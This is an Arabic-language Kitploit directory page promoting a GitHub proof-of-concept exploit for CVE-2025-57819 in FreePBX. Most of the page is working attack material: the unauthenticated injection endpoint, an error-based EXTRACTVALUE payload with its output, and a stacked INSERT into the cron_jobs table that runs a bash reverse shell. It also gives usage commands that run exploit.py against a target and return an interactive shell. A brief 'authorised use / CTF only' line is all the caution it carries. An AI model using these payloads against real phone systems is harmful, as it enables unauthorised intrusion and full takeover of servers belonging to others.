Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
أدوات/GitHubGitHub/b4sh2/cve-2025-57819-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

عرض المستودع
7246منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-57819 — حقن SQL غير مصدق عليه في FreePBX يؤدي إلى تنفيذ أوامر عن بعد (RCE)

استغلال لمرة واحدة لحقن SQL غير مصدق عليه في Endpoint Manager في FreePBX (CVE-2025-57819)، متسلسل إلى تنفيذ أوامر عن بعد عبر جدول cron_jobs في FreePBX.

للاستخدام المصرح به فقط في اختبارات الأمان / مسابقات CTF.


الثغرة

معالج ajax لوحدة endpoint يقوم بتسلسل المعامل brand مباشرة في استعلام SQL، ومسار الوحدة FreePBX\modules\endpoint\ajax يتجاوز فحص Referrer/المصادقة في ajax. وهذا يتيح حقن SQL غير مصدق عليه قائم على الأخطاء (عبر EXTRACTVALUE)، مع تمكين الكتابة عبر استعلامات مكدسة.

نقطة الحقن:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

إثبات (قراءة قائمة على الأخطاء):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
تنزيل الأداة

المتأثر: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

تقنية تنفيذ الأوامر عن بعد

الحقن هو للقراءة فقط بمفرده، لكن الاستعلامات المكدسة تسمح بالكتابة. يقوم FreePBX بتشغيل المهام من جدول cron_jobs عبر مدير cron الخاص به، لذا فإن إدراج صف يؤدي إلى تنفيذ أوامر عشوائية (خلال ~60 ثانية، الجدول الزمني * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

الأمر المحقون هو شل عكسي bash. يتم حذف صف cron تلقائيًا بعد أول استدعاء لتجنب الاتصالات المتكررة.

المتطلبات

root@kitploit:~
pip install requests urllib3

بايثون 3. كشف IP المدمج (-i/--interface) خاص بلينكس فقط؛ استخدم --ip على المنصات الأخرى.

الاستخدام

root@kitploit:~
# الإعدادات الافتراضية: واجهة tun0، المنفذ 4444 — يبدأ المستمع، يستغل، يمنح شل
python3 exploit.py http://{target}

# اختيار واجهة / منفذ آخر
python3 exploit.py http://{target} -i eth0 -p 9001

# تعيين IP المستمع صراحةً
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

النص البرمجي:

  1. يؤكد وجود حقن SQL (يسرب إصدار قاعدة البيانات).
  2. يبدأ مستمع TCP على المنفذ المختار.
  3. يحقن مهمة cron للشل العكسي ويتحقق من وصول الصف.
  4. ينتظر ~70 ثانية لاستدعاء العودة، ثم يمنحك شل تفاعلي (مع محاولة ترقية PTY تلقائية).
  5. ينظف صف cron المحقون.

المراجع

  • Horizon3.ai — تحديث CVEs FreePBX: تجاوز المصادقة وتنفيذ الأوامر عن بعد
  • مختبرات watchTowr — FreePBX CVE-2025-57819
  • إثبات المفهوم من watchTowr (GitHub)
  • NVD — CVE-2025-57819
  • تنبيه FreePBX GHSA-m42g-xg4c-5f3h